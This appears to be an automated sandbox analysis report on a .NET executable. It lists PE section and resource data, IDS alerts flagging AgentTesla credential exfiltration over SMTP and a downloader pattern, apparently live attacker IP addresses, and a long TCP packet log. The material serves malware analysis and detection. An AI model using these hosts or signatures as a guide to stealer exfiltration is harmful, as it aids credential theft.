                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                          .text0x20000x22f880x230002ea82fd39e8d48687f11e66a7f11baa7False0.38919503348214285data5.706214258576581IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                          .rsrc0x260000x10e4e0x11000dc5d679a1f01d28ae8a31ab5bc57d55cFalse0.05648265165441176data4.113628969869284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                          .reloc0x380000xc0x20053a9fec949eba3715ccae811c97f7ac5False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                          RT_ICON0x2606c0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.046492369572932686
                                                                                                          RT_GROUP_ICON0x368d00x14data1.15
                                                                                                          RT_VERSION0x369200x308data0.4497422680412371
                                                                                                          RT_MANIFEST0x36c640x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                                                          DLLImport
                                                                                                          mscoree.dll_CorExeMain
                                                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                          2024-12-03T15:20:35.207129+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.649759162.254.34.31587TCP
                                                                                                          2024-12-03T15:22:44.360977+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.6499735.253.86.15443TCP
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Dec 3, 2024 15:20:41.205113888 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:41.205158949 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:41.205255985 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:41.219614983 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:41.219635010 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:43.377708912 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:43.377917051 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:43.383757114 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:43.383769035 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:43.384042025 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:43.432998896 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:43.475338936 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.349741936 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.349769115 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.349837065 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.349862099 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.349905014 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.357779980 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.357848883 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.380072117 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.380139112 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.542232990 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.542448044 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.556621075 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.556757927 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.572978020 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.573118925 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.581207991 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.581290960 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.597333908 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.597446918 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.597464085 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.597512960 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.613535881 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.613636971 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.629856110 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.629968882 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.740951061 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.741080999 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.745021105 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.745114088 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.757622957 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.757755041 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.769023895 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.769139051 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.774867058 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.774955034 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.786243916 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.786340952 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.797621012 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.797710896 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.803781986 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.803874016 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.814579010 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.814660072 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.826168060 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.826280117 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.831582069 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.831655979 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.842895031 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.842982054 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.854772091 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.854882956 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.865353107 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.865425110 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.934134960 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.934216022 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.934343100 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.934385061 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.943219900 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.943286896 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.953130007 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.953180075 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.957334995 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.957386971 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.964605093 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.964660883 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.968319893 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.968400002 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.975307941 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.975368977 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.982074976 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.982129097 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.985541105 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.985593081 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.988756895 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.992168903 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.992214918 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.992225885 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.992309093 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:44.997344017 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:44.997391939 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.001880884 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.001938105 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.003726006 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.003789902 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.009341002 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.009402990 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.011529922 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.011584997 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.013238907 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.013298988 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.017580986 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.017642975 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.021766901 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.021847963 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.025012016 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.025078058 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.027050018 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.027112007 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.031104088 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.031160116 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.034919024 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.034997940 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.052695036 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.052784920 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.133656979 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.133747101 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.134649038 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.134716034 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.136271000 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.138432026 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.138498068 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.138511896 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.138556004 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.145246983 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.145311117 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.146394014 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.146455050 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.148876905 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.148941994 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.154308081 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.154377937 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.156461954 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.156537056 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.161312103 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.161381006 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.161422968 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.161475897 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.164037943 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.164103031 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.166809082 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.166873932 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.168477058 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.168549061 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.171360016 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.171423912 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.172696114 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.172768116 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.370745897 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.370893955 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.372195005 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.372265100 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.374030113 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.374095917 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.376512051 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.376586914 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.378499985 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.378566980 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.379595995 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.379663944 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.381412983 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.381472111 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.383441925 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.383505106 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.384505987 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.384586096 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.386274099 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.386337042 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.387748003 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.387809038 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.521085978 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.521209955 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.523380995 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.523467064 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.524964094 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.525042057 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.526144028 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.526223898 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.528235912 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.528312922 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.530339956 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.530424118 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.531673908 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.531739950 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.533591986 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.533654928 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.535917044 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.535983086 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.536685944 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.536752939 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.538651943 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.538731098 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.540249109 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.540316105 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.541498899 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.541563034 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.543687105 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.543756008 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.545291901 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.545361042 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.546483040 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.546547890 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.548712969 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.548777103 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.728643894 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.728816032 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.730616093 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.730700970 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.731880903 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.731956959 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.733886003 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.733975887 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.735780954 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.735857964 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.737165928 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.737241030 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.739212036 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.739288092 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.741039991 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.741112947 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.928981066 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.929059029 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.929078102 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.929164886 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.956526041 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.956665039 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.958578110 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.958668947 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.960453033 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.960529089 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.961709976 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.961790085 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.964328051 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.964401007 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.966268063 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.966335058 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.967197895 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.967293024 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:45.968404055 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:45.968457937 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.116326094 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.116457939 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.117539883 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.117614985 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.119597912 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.119687080 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.120726109 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.120848894 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.122562885 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.122627020 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.124607086 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.124676943 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.125778913 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.125844955 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.127897978 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.127963066 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.129828930 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.129900932 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.131280899 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.131340027 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.133744001 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.133807898 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.136275053 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.136342049 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.137362957 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.137433052 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.139902115 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.139959097 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.141994953 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.142087936 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.143176079 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.143241882 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.314210892 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.314426899 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.315443993 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.315522909 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.316606045 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.316668987 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.545119047 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.545382977 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.546199083 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.546277046 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.548249006 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.548319101 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.549438953 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.549503088 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.551795006 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.551858902 CET49715443192.168.2.6194.15.112.248
                                                                                                          Dec 3, 2024 15:20:46.554179907 CET44349715194.15.112.248192.168.2.6
                                                                                                          Dec 3, 2024 15:20:46.554244995 CET49715443192.168.2.6194.15.112.248
